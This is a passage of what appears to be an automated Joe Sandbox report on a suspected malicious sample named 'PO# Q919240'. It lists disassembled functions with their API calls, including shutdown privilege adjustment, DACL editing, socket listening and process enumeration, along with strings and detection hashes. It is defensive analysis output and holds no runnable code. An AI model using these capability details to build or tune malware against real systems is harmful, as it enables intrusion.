                • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                Function 004033C0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                • __wsplitpath.LIBCMT ref: 00403492
                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                • _wcscpy.LIBCMT ref: 004034A7
                • _wcscat.LIBCMT ref: 004034BC
                • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                • _wcscpy.LIBCMT ref: 004035A0
                • _wcslen.LIBCMT ref: 00403623
                • _wcslen.LIBCMT ref: 0040367D
                Strings
                • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                • Unterminated string, xrefs: 00428348
                • _, xrefs: 0040371C
                • Error opening the file, xrefs: 00428231
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                • API String ID: 3393021363-188983378
                • Opcode ID: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                • Opcode Fuzzy Hash: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                Download Yara Rule
                APIs
                • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                • FindClose.KERNEL32(00000000), ref: 00431B20
                • FindClose.KERNEL32(00000000), ref: 00431B34
                • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                • FindClose.KERNEL32(00000000), ref: 00431BCD
                • FindClose.KERNEL32(00000000), ref: 00431BDB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                • String ID: *.*
                • API String ID: 1409584000-438819550
                • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                Function 00431BE8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 116COMMON
                Download Yara Rule
                APIs
                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                • __swprintf.LIBCMT ref: 00431C2E
                • _wcslen.LIBCMT ref: 00431C3A
                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                • String ID: :$\$\??\%s
                • API String ID: 2192556992-3457252023
                • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                Function 004720DB Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON
                Download Yara Rule
                APIs
                • GetLocalTime.KERNEL32(?), ref: 004722A2
                • __swprintf.LIBCMT ref: 004722B9
                • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: FolderPath$LocalTime__swprintf
                • String ID: %.3d
                • API String ID: 3337348382-986655627
                • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON
                Download Yara Rule
                APIs
                • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                • FindClose.KERNEL32(00000000), ref: 0044291C
                • FindClose.KERNEL32(00000000), ref: 00442930
                • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                • FindClose.KERNEL32(00000000), ref: 004429D4
                  • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                • FindClose.KERNEL32(00000000), ref: 004429E2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                • String ID: *.*
                • API String ID: 2640511053-438819550
                • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
                Download Yara Rule
                APIs
                • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                • GetLastError.KERNEL32 ref: 00433414
                • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                • String ID: SeShutdownPrivilege
                • API String ID: 2938487562-3733053543
                • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                Function 00446124 Relevance: 16.7, APIs: 11, Instructions: 182COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                  • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                  • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                • GetLengthSid.ADVAPI32(?), ref: 004461D0
                • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                • GetLengthSid.ADVAPI32(?), ref: 00446241
                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                • CopySid.ADVAPI32(00000000), ref: 00446271
                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                • String ID:
                • API String ID: 1255039815-0
                • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                Function 0043305F Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                Download Yara Rule
                APIs
                • __swprintf.LIBCMT ref: 00433073
                • __swprintf.LIBCMT ref: 00433085
                • __wcsicoll.LIBCMT ref: 00433092
                • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                • LockResource.KERNEL32(00000000), ref: 004330CA
                • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                • LoadResource.KERNEL32(?,00000000), ref: 00433105
                • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                • LockResource.KERNEL32(?), ref: 00433120
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                • String ID:
                • API String ID: 1158019794-0
                • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                Function 0045A10F Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                • String ID:
                • API String ID: 1737998785-0
                • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                Function 0045D619 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107COMMON
                Download Yara Rule
                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                • GetLastError.KERNEL32 ref: 0045D6BF
                • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Error$Mode$DiskFreeLastSpace
                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                • API String ID: 4194297153-14809454
                • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                Function 0044EB5F Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 643COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _memmove$_strncmp
                • String ID: @oH$\$^$h
                • API String ID: 2175499884-3701065813
                • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                Function 004652BE Relevance: 12.1, APIs: 8, Instructions: 97networkCOMMON
                Download Yara Rule
                APIs
                • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                • listen.WSOCK32(00000000,00000005), ref: 00465381
                • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ErrorLast$closesocket$bindlistensocket
                • String ID:
                • API String ID: 540024437-0
                • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                Function 0044663B Relevance: 11.4, APIs: 1, Strings: 5, Instructions: 895COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                • API String ID: 0-2872873767
                • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                Function 004755C4 Relevance: 10.6, APIs: 7, Instructions: 148processCOMMON
                Download Yara Rule
                APIs
                • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
